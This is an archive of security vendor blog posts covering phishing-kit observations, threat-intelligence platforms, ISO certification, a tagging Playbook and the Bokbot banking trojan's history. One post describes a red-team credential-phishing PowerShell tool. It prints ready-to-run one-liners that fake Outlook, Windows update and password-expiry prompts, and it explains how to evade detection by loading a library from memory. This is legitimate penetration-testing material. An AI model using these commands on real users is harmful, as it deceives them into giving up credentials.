Category Archives: Blog

Inside the Phish: How a Phishing Campaign Really Works

Even with all of the hacks and third-party breaches that have plagued some of the biggest global corporations over the past few years, phishing remains one of the most frequent ways into an organization. It has been reported that up to 93% of all breaches start with a phish.

LookingGlass has broad and deep access to phishing data and insight into phishing campaign techniques. We hope that by sharing the “behind-the-scenes” of a phishing attack, your organization can be better prepared to defend against this recurring digital risk.

Year-to-date we have observed the following as some of the top phishing “targets” or brands used as bait:

  • Wells Fargo
  • Microsoft
  • PayPal
  • Dropbox
  • Google

None of these should come as a surprise, as they are all well-known brands with expansive customer bases, and attackers typically cast a wide net in an effort to reach as many victims as possible. For example, if an attacker wants to infiltrate a corporate environment, they can make a fairly educated guess that the business is quite likely using a service such as Microsoft 365. Thanks to widely available dumps of email addresses and account information, the attacker just needs to collect a list of email addresses associated with the business, craft a strategically themed phishing email, and then wait for the clicks to commence – and they will most certainly commence.

A common theme we have observed across these targets is login pages designed to harvest user credentials. In August, we took a look at a phishing campaign that targeted PayPal. In this instance, the phishing link was hosted on a WordPress site of an apparent victim domain, where the domain owner most likely had no idea that they were serving up malicious content on their site. A visit to the site’s home page revealed a very unobtrusive comment indicating that the site had been “Hacked by Virus-ma” (figure 1):

Virus Ma


Some quick research revealed Virus-ma had at least one hacking-related YouTube video channel.

When a user visits the phishing page via the phishing link, they are presented with an extremely realistic PayPal spoof (figure 2):

PayPal Login Page

Whatever credentials the user enters (we obviously did not use legitimate PayPal credentials in our testing) are accepted, and the user is directed to the next screen, which requests contact information. The screen after that asks for credit card information, social security number, and account number (figure 3):

Update Your Credit/Debit Card

The credit card data is checked in real time, so incorrect or false entries are instantly rejected. Our research did not go beyond this screen as we were not willing to provide legitimate user financial information that could be verified. Also, it is noteworthy that the website is encrypted, which gives a false sense of security to the user, ultimately making them more likely to provide confidential and sensitive information. In this case, the domain used a TLS certificate signed by cPanel (figure 4):
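We did not inspect the validation code behind the real-time card check, but a common first-pass filter for card numbers (applied before any verification against a payment network) is the Luhn checksum. A minimal sketch in Python:

```python
def luhn_valid(card_number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    digits = [int(d) for d in card_number if d.isdigit()]
    if len(digits) < 12:
        return False
    total = 0
    # Double every second digit from the right; subtract 9 if the result exceeds 9.
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# A well-known test number passes; a single mistyped digit fails.
print(luhn_valid("4111 1111 1111 1111"))  # True
print(luhn_valid("4111 1111 1111 1112"))  # False
```

A checksum failure lets a phishing kit reject obvious junk instantly, which is part of what makes the page feel legitimate.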


The page source behind these pages revealed some interesting data about the attacker, in which they identify themselves and out the page as a “scam page” (figure 5):

Phishing Log

At LookingGlass Cyber we see hundreds of phishing attacks like these every day. Trying to prevent them is a daunting task, but with an understanding of the processes behind the phish, organizations can better educate their users about what to avoid as well as put appropriate detection methods in place.

Protect yourself from future phishing attacks here, or contact us.


The post Inside the Phish: How a Phishing Campaign Really Works appeared first on LookingGlass Cyber Solutions Inc.

Can Your SOC Use More Visibility?

The Security Operations Center (SOC) is an intricate ecosystem of personnel, network equipment, cybersecurity appliances, and traffic and flow data, all working to manage the workflow from threat alerts. To minimize exposure, a SOC is designed to provide a “defense-in-depth” posture. This comprehensive approach to cybersecurity involves antivirus and endpoint tools, log management, a Next Generation Firewall (NGFW), website defenses, and other complementary security technologies. However, SOCs have several critical limitations.

The first limitation is “paralysis of analysis.” Each layer of defense adds a level of complexity. For example, a miscreant attempting to access the network may simultaneously trigger alerts for known malware, a rules-based violation from a SIEM, and an extrusion attempt by an end user on a restricted port caught by the NGFW. Redundant alerts are often mixed in with benign alerts from non-security events.

A perimeter defense only activates on an alert or during an ongoing breach. Step back and think about this for a second. When a SOC analyst begins a forensic investigation, the analyst only knows that something is wrong. Their first move should be to look for known-bad malware hashes, or to look up IP addresses, fully qualified domain names, DNS records, and registered owners to learn about an attack’s origins, what sites an end user has visited, and where malware was acquired. Historically, SOC teams have had no advanced triage of the external threat environment, and they often must develop strategies on the fly.

Another problem is that traditional SOC strategies assume that threat vectors must always be signature-based. In 2018, the malefactor is pride-less. Often, an adversary can create a damning social media attack against a company’s brand or against individuals—the proverbial “fake news.”

The network is changing to expedite business use cases. From a security perspective, this brings about new challenges. Contractors may need access to a network, and integration partners often share intellectual property on the network to facilitate better operations or integrate to build a deeper security posture. However, contractors and business partners may bring their own sets of vulnerabilities to the host network.

External threat feeds can add to the aggravation. Like flow data, network performance indicators, and the investigation of alerts, external threat feed data is yet another source of information that needs to be normalized and contextualized inside the SOC.

Fundamentally, IDC believes there needs to be an approach that can complement defense-in-depth. With LookingGlass ScoutPrime, we see a platform that:

  • Produces a single risk score called the Threat Indicator Confidence (TIC) score that factors in the potential impact of malware, the topography of connections to the network, and the reliability of the source.
  • Provides a platform that scans the entire Internet, a greater capability than merely collecting and normalizing multiple threat feeds.
  • Monitors deceptive proxy activities to spot when adversaries are using APIs, fuzzed spellings, and anagrams of keywords to make a website look authentic.
  • Combines human insight with machine-readable threat intelligence to normalize data in real time. LookingGlass has over 500 algorithms designed to prioritize threat feed data and weed out redundancies.
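The actual TIC scoring model is not public, but the general idea of blending several normalized factors into one score can be illustrated with a hypothetical weighted sum. The weights, factor names, and scale below are invented for illustration only:

```python
def risk_score(impact: float, topology_proximity: float, source_reliability: float,
               weights=(0.5, 0.3, 0.2)) -> float:
    """Blend three 0-1 factors into a single 0-100 score (illustrative only)."""
    w_impact, w_topo, w_source = weights
    return round(100 * (w_impact * impact
                        + w_topo * topology_proximity
                        + w_source * source_reliability), 1)

# A high-impact threat seen close to your network from a reliable feed scores high.
print(risk_score(impact=0.9, topology_proximity=0.8, source_reliability=0.95))  # 88.0
```

A single composite number like this is what lets analysts triage by sorting rather than reading every alert.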

Defense-in-depth is still effective, and cybersecurity is often the execution of many things done well. However, the next security wave may be to think outside the SOC.

The post Can Your SOC Use More Visibility? appeared first on LookingGlass Cyber Solutions Inc.

ThreatConnect achieves ISO 27001:2013 certification

Continuing our commitment to protect our customers' data

What is ISO 27001?
ISO 27001 is an internationally recognized standard defining requirements for a systematic approach to managing sensitive information, also known as an information security management system (ISMS).

But what's an ISMS?
Think of an ISMS as the blueprint for how we identify, assess, and act on or manage risk. Through our ISMS, we employ functionally verifiable processes to protect your data and our services.

So why does ThreatConnect follow ISO 27001?
ISO 27001 is the gold standard for risk management. It's both specific and comprehensive. When implementing a security program, it's important to select effective and appropriate security controls. A security program needs to be adaptable and extensible to address changing technologies, industries, and threats. It also needs to be verifiable. The ISO 27001 standard defines a well-understood process that trusted auditors use to examine a submitted ISMS and certify that it conforms to the gold standard.

What does it mean to be certified?
Certification provides verifiable third-party proof of compliance with the standard and guarantees that we have accomplished the following objectives:

  • formally adopted a risk management approach;
  • assessed our information security risks according to this approach;
  • selected an appropriate set of security controls to mitigate these risks;
  • implemented appropriate methodologies and processes to continually monitor and improve the system and its controls;
  • performed an internal audit of the ISMS;
  • received favorable audit results of the ISMS against the ISO 27001:2013 standard by an ISO-accredited third party.

Certification itself doesn't change our ISMS or security practices. It doesn't mean we protect your data any differently than before. It does mean, however, that you can be confident in our security practices. We've not only let an internationally recognized third party examine them, but we've also committed to continually improving those practices.

What does it mean for our customers?
ThreatConnect has always been committed to securing customer data. While we didn't have to submit our ISMS for certification, we chose to do so to provide our customers with additional confidence in our commitment to them. Because we follow the ISO 27001:2013 standard, we understand the risks to the data they entrust us with, as well as to our services, and have implemented controls to manage those risks.

Trust is earned, and we understand this. It's ThreatConnect's commitment to continue to show that your trust in us is well founded. For more information about ThreatConnect or our security program, please connect with us.

(Certification scope: configuration, management, support, and delivery activities related to cloud systems supported by Amazon RDS.)

The post ThreatConnect achieves ISO 27001:2013 certification appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Document Parsing and Keyword Scanning/Tagging

Automatically tag the documents with keywords and focused areas of interest without human intervention

ThreatConnect developed the Playbooks capability to help analysts automate time-consuming and repetitive tasks so they can focus on what is most important, and in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

This Playbook is actually a set of three Playbooks: one that saves the keywords, one that verifies the data was saved as the analyst expected, and one that actually performs the work.

Many customers have reached out and voiced frustration because analysts were spending a lot of time looking through various reports for specific keywords and then manually applying tags based on those keywords. This was very time-consuming, especially for one customer who had 10 separate focus areas with more than 200 different keywords.

With this Playbook set, analysts can automatically tag the documents with keywords and focused areas of interest without human intervention, saving the analyst about 4-5 hours/week.

This Playbook set is triggered by the creation of a document in a source (with a specific tag, "parseme", a requirement that can be removed after verifying expected functionality). First, you set the list of keywords in the datastore contained within ElasticSearch: in JSON, you define a set of keywords, group them, and save them as variables. The main Playbook converts the document into a set of strings that is then passed to the regex capture groups for comparison. For keywords that match, the Playbook creates the tag for the group (e.g., China/Russia) and additionally tags the document with the actual keywords that matched (e.g., APT12/APT28).
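The matching step can be sketched in miniature. This is not the Playbook itself, just an illustration of grouped keywords feeding regex matching; the group and keyword names are the examples from the post:

```python
import re

# Hypothetical keyword groups, as they might sit in the ElasticSearch datastore.
KEYWORD_GROUPS = {
    "China": ["APT12", "APT41"],
    "Russia": ["APT28", "APT29"],
}

def tags_for(document_text):
    """Return group-level tags plus the individual keywords that matched."""
    tags = set()
    for group, keywords in KEYWORD_GROUPS.items():
        pattern = r"\b(" + "|".join(map(re.escape, keywords)) + r")\b"
        matches = re.findall(pattern, document_text)
        if matches:
            tags.add(group)       # group tag, e.g. "Russia"
            tags.update(matches)  # keyword tags, e.g. "APT28"
    return tags

print(sorted(tags_for("Activity attributed to APT28 overlaps with APT12 tooling.")))
# ['APT12', 'APT28', 'China', 'Russia']
```

The real Playbook does the same thing with ThreatConnect's regex capture groups and then applies the resulting tags to the document automatically.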


1)  Import "Populate DataStore with Keywords.pbx"
In this Playbook you set a JSON array with your keywords. There are a few examples already preconfigured out of the box to get you started. This Playbook only needs to be run once to populate the datastore (and any other time the list needs to be updated).

Populate DataStore with Keywords


2) Import Document Keyword Check.pbx
This Playbook will need to be set to monitor a specific owner and, as a safety measure, is currently configured to fire on the tag "parseme". After verifying functionality, this tag requirement can be removed so that it runs each time a document is created.

Document Keyword Check

The post Playbook Fridays: Document Parsing and Keyword Scanning/Tagging appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Threat Intelligence Brief: August 28, 2018

Threat Intelligence Briefs

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“July 2018 was the worst month of 2018 for healthcare data breaches by a considerable distance. There were 33 breaches reported in July – the same number of breaches as in June – although 543.6% more records were exposed in July than the previous month. The breaches reported in July 2018 impacted 2,292,552 patients and health plan members, which is 202,859 more records than were exposed in April, May, and July combined.”

 –HIPAA Journal


“T-Mobile USA announced a security breach late last night. The company says its cyber-security team discovered and shut down unauthorized access to its customers’ data on Monday, August 20. T-Mobile said the hacker (or hackers) did not gain access to passwords, social security numbers, or any financial information. Impacted customers will receive an SMS, letter in the mail, or a phone call to notify them. The US telco says it informed law enforcement authorities about the breach. A T-Mobile spokesperson told Motherboard that less than 3% of its customer base was affected. T-Mobile reported 75.62 million customers at the end of Q2 2018. That would put the breach at around 3.9 million customers, still a considerable number. As some T-Mobile users have pointed out, even if the hackers did not get their hands on any financial data or passwords, the breach makes it easier for the attacker to port (SIM swap) numbers.”


Information Security Risk

“A Necurs botnet has been used to launch a campaign of targeted phishing emails aimed at breaching the cyber defenses of a number of banks. A security vendor said the short-lived phishing campaign began on August 15 and targeted more than 2,700 bank domains. However, after a few hours the attacks abruptly ceased. In the latest short-lived attack, targeted phishing emails were sent to banking employees, most carrying a file with the .pub extension. This extension is used by Microsoft Publisher. “Like Word and Excel, Publisher has the ability to embed macros. However, not all of the emails carried .pub files. Some delivered infected PDF files instead. The infected files featured macros which on opening caused malware to be downloaded to the victim’s machine from a remote server.””


Reputational Risk

“A US bank has agreed to pay a $10.5 million settlement to resolve two separate complaints. The first issue stems from bad loans issued by its Mexican subsidiary to an oil company from 2008-14, which led to losses of $475 million. The second complaint was centered on mismarked illiquid positions and unauthorized proprietary trading from 2013-16. Three traders, now fired, mismarked illiquid positions in proprietary accounts they managed, leading to the covering of losses from widespread unauthorized trading. Regulators allege the bank failed to detect the misconduct sooner because it lacked supervisory procedures and systems to verify the valuations of the mismarked positions.”

The post Threat Intelligence Brief: August 28, 2018 appeared first on LookingGlass Cyber Solutions Inc.

How to Choose the Right Threat Intelligence Platform for You

Understand its "job" and what you and your team need

The first step in choosing the right threat intelligence platform (TIP) for you is to figure out what you actually want the TIP to do. One pitfall security teams often fall into is approaching the selection with a checklist of criteria, without really evaluating the problems they're trying to solve; they end up with a product that "checks all the boxes" but collects dust.

For example, if you're buying a car, here are some things you might be looking for:

  • Safety, e.g. five star crash-test ratings
  • A decent sound system
  • "Sporty," whatever that means
  • Good gas mileage
  • Lane assist

Those are all admirable features or qualities for a car to have, but consider the reason you're buying the car (in other words, the thing you're buying the car to do):

  • Get the kids to school and soccer practice, and maybe keep them entertained on longer trips
  • Show up the other guys and gals at the firm with their fancy imports
  • Survive the ultimate road trip

The five "features" listed above might all factor into the three "reasons," but imagine if the status-seeker showed up with a minivan, or the soccer parent showed up with a convertible coupe? The features are the same, but the final product, what's really needed, is totally different.

So the first step in selecting a TIP is not picking out the key features - it's nailing down the "job" of a TIP.

What's the "job" of a TIP?

Your mileage may vary, and introspection is certainly key here, but for most teams the main jobs of a TIP are:

  1. Aggregation. Get all of my feeds and reports into a central location - a "source of truth" - where they can be accessed in a standardized format by anyone who needs them.
  2. Analysis. Figure out what's really relevant to me and my team. "Is this a threat to me?"
  3. Action. Send the right intel to my detection and defense devices. Some might call this "operationalizing" the intelligence.

Major "check the box" items like DNS lookups, machine-readable threat intelligence, STIX/TAXII, etc., are all features in service of those larger goals. Even key capabilities like automation and orchestration are just better ways of accomplishing the jobs: automation can help make teams more effective in the Analysis job, for example, by streamlining key enrichment tasks. Orchestration can help on the Action side by linking together all manner of disconnected systems.

What matters, though, is how effectively the TIP can actually do the job you want it to do. You're probably doing those jobs today already: with spreadsheets, cutting and pasting, Word docs, custom Python scripts, prayer, etc. The TIP makes you more effective at those jobs.

Let's take a look at how a TIP helps you accomplish these three key jobs of Aggregation, Analysis, and Action.

Aggregation - Get All Your Stuff in One Place

The first job you might want to hire a TIP for is to centralize all of your intelligence. So the question is, what intelligence are you collecting today, and how do you receive it? Consider making a checklist of the intelligence and its delivery mechanism. It might look something like this:

Intelligence | Delivery Mechanism
Premium feed | Proprietary API and PDF reports
ISAC alerts | Sent via email in plain text or STIX
My favorite researcher blog | Website
Internal network activity | Available in my SIEM
Internal threat reports | Spreadsheets and corporate wiki
Open source feed | TAXII

Once you understand what you want to bring in, you can start to review how effective the TIP is at adding the data. For example, does the TIP have native integrations with your premium feeds, or would you need to write something custom (and possibly hire software developers)? Can the TIP automatically extract indicators from your ISAC alert emails, or would your analysts need to cut and paste? Understanding how the TIP "gets the job done" can help you understand how effective that TIP is at doing the job. For example:

Intelligence | TIP #1 | TIP #2
Premium feed | Native integration and in-app PDF report display | Native integration
ISAC alerts | Parses email alerts and converts them into machine-readable threat intelligence (MRTI) | Cut and paste
My favorite researcher blog | Aggregates popular blogs and converts them into MRTI | Cut and paste, or a custom script for web scraping
Internal network activity | Bidirectional integration with my SIEM | Requires a custom app
Internal threat reports | SDK and API allow integration with internal wiki | Not available
Open source feed | TAXII client | TAXII client

While both TIPs in the above example have ways to do the job, TIP #1 is going to be more effective.
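To make the comparison concrete, the email parsing TIP #1 automates (and TIP #2 leaves to cut and paste) boils down to indicator extraction. A deliberately simplified sketch, assuming plain-text alerts; production parsers must also handle defanged indicators such as hxxp:// and example[.]com:

```python
import re

# Simplified patterns for three common indicator types.
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[a-fA-F0-9]{32}\b")
DOMAIN_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b")

def extract_indicators(alert_text):
    """Pull IPs, MD5 hashes, and domains out of a plain-text alert."""
    ips = IP_RE.findall(alert_text)
    return {
        "ips": ips,
        "md5s": MD5_RE.findall(alert_text),
        # Drop anything already matched as an IP address.
        "domains": [d for d in DOMAIN_RE.findall(alert_text) if d not in ips],
    }

alert = "C2 at 203.0.113.7 (bad-domain.example), dropper md5 d41d8cd98f00b204e9800998ecf8427e"
print(extract_indicators(alert))
```

Whether this parsing is built into the TIP or left to analysts' clipboards is exactly the effectiveness gap the table above describes.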

Analysis - Weed out the Irrelevant Stuff

Once you've collected the data, the next step is to identify the relevant intelligence so you can take action while avoiding false positives. Just like with the "Aggregate" job, the first step is to lay out what sort of analysis you want to do:

  • Check log files for malicious indicators
  • Look up data in third party enrichment tools
  • Monitor your domains for spoofing attempts
  • Analyze malware files
  • Track threat actors across multiple campaigns
  • Weed out false positives

And once again, we look to see how each TIP accomplishes the job you want it to do:

Analysis | TIP #1 | TIP #2
Check log files for malicious indicators | Drag-and-drop files for immediate analysis and enrichment | Import files, manually parse out indicators, and review
Look up data in third-party enrichment tools | Automated lookups in any enrichment service that offers a REST API | Out-of-the-box integrations with several (but limited) popular enrichment services
Monitor your domains for spoofing attempts | Domain-spinning workbench | Domain monitoring for hire
Analyze malware files | Automated analysis in multiple third-party AMAs | Integrated sandbox, limited support for other AMAs
Track threat actors across multiple campaigns | Flexible data model aligned to the Diamond Model of Intrusion Analysis | Rigid data model with some Kill Chain support
Weed out false positives | Globally crowdsourced reports of known false positives | Manual tagging
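A "domain-spinning workbench" generates lookalike permutations of your domains so new registrations can be monitored for spoofing. A toy sketch of three common techniques (character transposition, homoglyph substitution, TLD swap); real tools generate far more variants:

```python
def spin_domains(name: str, tld: str = "com") -> set:
    """Generate a few common lookalike permutations of a domain label."""
    variants = set()
    # Adjacent-character transposition, e.g. "paypal" -> "apypal".
    for i in range(len(name) - 1):
        variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)
    # Simple homoglyph substitutions.
    for a, b in [("l", "1"), ("o", "0"), ("i", "l")]:
        if a in name:
            variants.add(name.replace(a, b) + "." + tld)
    # Alternate TLDs, including the classic dropped-letter "cm".
    for alt in ("net", "co", "cm"):
        variants.add(name + "." + alt)
    variants.discard(name + "." + tld)  # never include the legitimate domain
    return variants

print(sorted(spin_domains("paypal")))
```

Feeding a list like this into passive DNS or new-registration feeds is what turns spinning into monitoring.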

Analysis can be more challenging to evaluate than aggregation because there are so many more options, but that's okay: what's important is that you understand what your team needs and what the TIP provides. For example, if your team is just ramping up and needs room to grow, you'll want a TIP that offers some basic enrichment while still being extensible. If you have a mature team, you'll want one that is flexible enough to adapt to your processes (rather than the other way around).

Action - Send the Relevant Stuff Where It Can Protect You

Getting intelligence out of a TIP is just as important as getting data in. I'd argue that, while taking Action depends on Aggregation and Analysis, Action is the most important job a TIP can do for you.

Action | Destination
Deploy to defensive devices | SIEM, EDR, firewall, etc.
Publish internal intelligence | Security team, executives, risk management
Publish external intelligence | ISAC, sharing community, law enforcement
Loop in other teams on critical intel | SOC, Incident Response, IT, etc.

So really, the question becomes: what form do you want your intelligence to take, and where do you need it to go?

Action | TIP #1 | TIP #2
Deploy to defensive devices | Integrations, rule-based runtime apps, flexible automation/orchestration engine | Integrations, rule-based runtime apps
Publish internal intelligence | Export, PDFs, integrations with ticketing systems, scheduled delivery | Export
Publish external intelligence | TAXII server, export, anonymous crowdsourced analytics | TAXII server, export
Loop in other teams on critical intel | In-app notifications, email, Slack | Email

Given the wide variety of possible outputs and the importance of the Action job, it's worth taking the time to assess the desired end state of your intelligence and how that end state is achieved with any particular TIP.

A Word on Orchestration

I've mentioned several instances above where the job being done is accomplished by way of orchestration or automation. With all the buzz around orchestration, it can be tempting to think that orchestration is something separate from what you want out of a TIP, but that's a mistake. Orchestration is simply a means to an end. If orchestration can make the job you want the TIP to do more effective, then why not consider a TIP with orchestration?

Consider seat belts, airbags, and lane assist. All of those features are designed to do the job of keeping you safe, and they contribute in different ways and with different levels of effectiveness. Orchestration in a TIP is no different. For example, you might need to detonate malware in an Automated Malware Analysis (AMA) tool. There are many ways to accomplish that from a TIP:

  1. Download a file from the TIP and manually upload it to the AMA
  2. Use the TIP's built-in sandbox
  3. Use the TIP's out-of-the-box AMA integration
  4. Use a TIP's orchestration capability to automatically send malware to an AMA, detonate it, retrieve the results, and get notified if something relevant is found

In all four cases, the job being done is the same: malware analysis. What differs is the tooling and how effectively the TIP gets the job done; the differences can mean significant time savings. In nearly every case, orchestration is a fantastic tool for making a TIP more effective and a better fit for the specific job you need done, for the simple reason that orchestration gives you total control over how that job is performed.
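Option 4 is essentially a submit/poll/notify loop. The sketch below illustrates that loop with stub functions standing in for a hypothetical AMA's REST calls (no real product's API is shown; the threshold and field names are invented):

```python
import time

def detonate_and_notify(submit, get_report, notify, sample_path, poll_interval=1):
    """Submit a sample, poll until analysis finishes, notify if relevant.

    submit/get_report/notify stand in for a hypothetical AMA's REST API.
    """
    job_id = submit(sample_path)
    while True:
        report = get_report(job_id)
        if report["status"] == "done":
            break
        time.sleep(poll_interval)
    if report["score"] >= 7:  # arbitrary relevance threshold for this sketch
        notify(f"Sample {sample_path} scored {report['score']}")
    return report

# Stubbed "AMA" so the sketch runs end to end.
reports = {"job-1": {"status": "done", "score": 9}}
msgs = []
result = detonate_and_notify(
    submit=lambda path: "job-1",
    get_report=lambda job_id: reports[job_id],
    notify=msgs.append,
    sample_path="dropper.exe",
)
print(result["score"], msgs)
```

An orchestration engine runs this whole loop for you, which is why option 4 beats the manual download-and-upload of option 1.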

In the end, when we talk about selecting a TIP based on what you and your team need it to do, keep these tips in mind:

  1. Make a checklist of what you and your team need the TIP to aggregate, analyze, and operationalize. Don't rely on a wishlist of features; rely on the jobs you want done.
  2. For each item on the list, consider how it's being done now.
  3. For every TIP you're evaluating, consider how that TIP accomplishes the jobs on your checklist.
  4. Remember that orchestration is just another way to accomplish one of those jobs.

Want to learn more? Sign up for a TC Open account! It's free.

TC Open™ is a completely free way for individual researchers to get started with threat intelligence. While this is not a free trial of the full platform, TC Open allows you to see and share open source threat data, with support and validation from our free community.

The post How to Choose the Right Threat Intelligence Platform for You appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Phishing – Ask and ye shall receive

During penetration tests, our primary goal is to identify the different paths that can be used to reach the goal(s) agreed upon with our customers. This often succeeds due to insufficient hardening, lack of awareness, or poor password hygiene. Sometimes we do get access to a resource, but do not have the username or password of the user that is logged on. In that case, a solution can be to simply ask for credentials in order to increase our access or escalate our privileges throughout the network. This blog post details how the default credential-gathering module in a pentesting framework like Metasploit can be further improved, and introduces a new tool and a Cobalt Strike module that demonstrate these improvements.

Current situation

Let’s say we have a Meterpreter session running on our target system but were unable to extract user credentials. Since the Meterpreter is not running with sufficient privileges, we also cannot access the part of memory where the passwords reside. To ask the user for their credentials, we can use a post module that spawns a credential box on the user’s desktop. This credential box looks like the one in the image below.


While this often works in practice, a few problems arise with using this technique:

  • The style of the input box stems from Windows XP; when newer versions of Windows ask for your credentials, a different type of input box is used;
  • The credential box spawns out of the blue. Even though a message and a title can be provided, it does not really look genuine; it lacks a scenario in which a credential box asking for your credentials is justified.

A better solution

Because of these issues, this technique may not work on more security-aware users. These users can be interesting targets as well, so we created a new script that solves the aforementioned problems. In creating a realistic scenario, our main question was: “What would work on us?” The answer to this question must at least entail the following:

  • The credential box should be genuine and the same as the one that Windows uses;
  • The credential box should not be spawned out of the blue; the user must be persuaded or should expect a credential box;
  • If (error) messages are used, the messages should be realistic. Real life examples are even better;
  • No or limited visible indications that the scenario is not real.

As a proof of concept, Fox-IT created a tool that uses the following two scenarios:

  • Notifications that stem from an (installed) application;
  • System notifications that can be postponed.

With this, the attacker can use his creativity to deceive the user. Below are some examples that were created during the development of this tool:

Outlook lost connection to Microsoft Exchange. In order to reconnect, the user must specify credentials to reestablish connection to Microsoft Exchange.


Password that expires within a short period of time.


The second scenario imitates notifications from Windows itself, such as pending updates that need to be installed. The notification toast tricks the user into thinking that the updates can be postponed or dismissed. When the user clicks on the notification toast the user will be asked to supply their credentials.


If the user clicks on one of these notifications, the following credential box will pop up. The text of the credential box is fully customizable.


Once the user has submitted their credentials, the result is printed to the console, which can be intercepted with a tool of your choosing, such as Cobalt Strike. We created an aggressor script for Cobalt Strike that extends the user interface with a variety of phishing options.


Clicking on one of these options will launch the phishing attack on the remote computer. And if users enter their credentials, the aggressor script will store them in Cobalt Strike as well. The tool and the Cobalt Strike aggressor script are available on Fox-IT’s GitHub page:


Technical details

During the development of this tool, there were some hurdles to overcome. At first, we created a tool that pops a notification balloon. That worked quite well; however, the originating source was shown in the balloon as well. It’s not really genuine when Windows PowerShell ISE asks for Outlook credentials, so that was not a solution that satisfied us.


In recent versions of Windows, toast notifications were introduced. These notifications look almost the same as the notification balloon we used earlier, but work entirely differently. By using toast notifications, we solved the problem of the originating source being shown. However, it proved impossible to use event handlers on toast notifications with native PowerShell. We needed an additional library that acts as a wrapper, which can be found on the following GitHub page:

That library solved one part of the issue, but it needed to be present on the filesystem of the target computer. That leaves traces of our attack, and we want to leave as few traces of our malicious code as possible. Therefore, we encoded the library as base64 and stored it in the PowerShell script. The base64-encoded library is decoded and loaded from memory at runtime, leaving no trace on the filesystem once the tool has been executed. We now had a tool capable of sending genuine-looking toast notifications. Because of how Windows works, we could also create an extra layer of trust by using an application ID as the source of the notification toast. If the corresponding AppID can be found, the toast notification appears to be issued by that application rather than by an attacker.
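The embed-and-load idea can be sketched in a few lines. Below is an illustrative Python sketch (the tool itself does the equivalent in PowerShell, decoding the embedded base64 string and loading the assembly from memory via [System.Reflection.Assembly]::Load); the function names are ours:

```python
import base64

def encode_library(dll_bytes: bytes) -> str:
    # Build step: turn the wrapper DLL into a base64 string that can be
    # pasted into the script as a constant, so no file ships alongside it.
    return base64.b64encode(dll_bytes).decode("ascii")

def decode_library(blob: str) -> bytes:
    # Runtime step: recover the raw DLL bytes in memory; nothing is
    # written to the target's filesystem.
    return base64.b64decode(blob)
```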

The notification toast supports the following:

  • Custom toast notification title;
  • Custom credential box title;
  • Custom multiline toast notification message.

To make it more personal, it is possible to reference attributes of the System.DirectoryServices.AccountManagement.UserPrincipal object. These attributes can be found in the following Technet article: Additionally, the application scenario supports the following extra features when an application name is provided and can be found by the tool:

  • AppID lookup to add an extra layer of credibility. If no AppID is found, the tool defaults to the Control Panel;
  • Extraction of the application icon. The extracted icon will be used in the notification toast;
  • If no process is given or the process cannot be found, the tool will extract the information icon from the C:\Windows\system32\shell32.dll library. By modifying the script, it is easy to incorporate icons from other libraries as well;
  • Hiding of application processes. All windows will be hidden from the user for extra persuasion. Visibility is restored once the tool finishes or the user has supplied their credentials.

Cmdline examples

For the examples above, the following one-liners were used:

Outlook connection:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Microsoft Office Outlook" -ToastMessage "Connection to Microsoft Exchange has been lost.`r`nClick here to restore the connection" -Application "Outlook" -credBoxTitle "Microsoft Outlook" -credBoxMessage "Enter password for user '{emailaddress|samaccountname}'" -ToastType Application -HideProcesses

Updates are available:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Updates are available" -ToastMessage "Your computer will restart in 5 minutes to install the updates" -credBoxTitle "Credentials needed" -credBoxMessage "Please specify your credentials in order to postpone the updates" -ToastType System -Application "System Configuration"

Password expires:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Consider changing your password" -ToastMessage "Your password will expire in 5 minutes.`r`nTo change your password, click here or press CTRL+ALT+DELETE and then click 'Change a password'." -Application "Control Panel" -credBoxTitle "Windows Password reset" -credBoxMessage "Enter password for user '{samaccountname}'" -ToastType Application


There are no recommendations specific to this phishing technique; however, some more generic recommendations still apply:

  • Check that PowerShell script logging and transcript logging are enabled;
  • Raise security awareness;
  • Although it is quite hard to distinguish a fake notification toast from a genuine one, users should treat any process asking for their credentials with suspicion.

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, the analysis quickly revealed that it's connected to a well-known actor group behind an operation publicly known as 76service, and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest led to its downfall in January 2017. Just a few months afterwards we discovered a new bot with a completely new code base, but based on ideas and strategies from the days of Neverquest. Their business ties remain intact: they still utilize services from the same groups as before, but have also expanded to use new services.

This suggests that at least part of the group behind Neverquest is still operating using Bokbot. It is, however, unclear how many people from the core group have continued on with Bokbot.

Bokbot is still a relatively new bot, only recently reaching a production state in which its creators have streamlined and tested their creation. Even though it's a new bot, the group still has strong connections within the cybercrime underworld, enabling them to maintain and grow their operation, for example by distributing their bot to a larger number of victims.

Looking back at the history and the people behind this, it is highly likely that this threat is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet's size and the target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, formgrabbing where authorization and log-in credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page (source:

76service login page (source:

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when a Ukrainian national named Nikita Kuzmin was arrested in connection with the operation. This marked the end of 76service.

Nice Catch! – The real name of Neverquest

